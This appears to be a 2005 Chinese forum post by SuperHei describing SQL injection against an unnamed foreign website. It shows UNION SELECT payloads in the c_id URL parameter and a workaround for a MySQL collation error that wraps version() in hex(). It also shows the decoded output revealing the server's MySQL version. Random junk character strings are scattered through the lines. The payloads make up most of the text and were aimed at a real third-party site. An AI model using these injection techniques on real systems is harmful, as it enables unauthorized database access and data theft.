本文作者:SuperHei
" T2 W6 p7 i& m! o1 ^" }- ?文章性质:原创5 J$ _1 |6 Q& T2 Q" D* o. K/ e7 ?7 o
发布日期:2005-10-18
* ]+ L! t) @/ e测试个国外的站时:4 v. ]; q' ^& w4 ^8 S O6 B
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
8 L1 [6 x- d _; c返回错误:
7 }1 j$ Z& g( `: SIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
0 j6 x9 L3 t" X! Y9 }* jMySQL Error No. 126
; Z3 ~5 q \0 _+ D0 j% m4 M! \4 P看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。; k; b; n9 S4 y5 [7 T
解决办法:转为其他编码如hex。
1 B+ r6 M. ^" w1 Burl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
& f; P3 P7 F. b6 W6 l" Z& E成功得到hex(version())的值为:0 ^2 x) F+ m3 {6 H; e) H
342E312E332D626574610 U4 e" l0 |. z+ A+ b3 |) u+ t
回Mysql查询下得到:
* f, o9 [* W' U Xmysql> select 0x342E312E332D62657461;
- E6 n+ ^' h6 H; E% l( m+------------------------+
7 ^" q1 P& p2 X! ?) W- y! O| 0x342E312E332D62657461 |
3 f+ a3 J+ ~4 J+------------------------+( L1 q0 H; f% _8 Q# [
| 4.1.3-beta |
: z& t0 _/ S/ p7 x+------------------------+: F, D* g3 E) n" {3 L6 q
1 row in set (0.00 sec)
# o0 n2 Q7 d( Q& d! ~0 d2 G: m% G* p! \1 `6 @2 Y3 _, d; D
|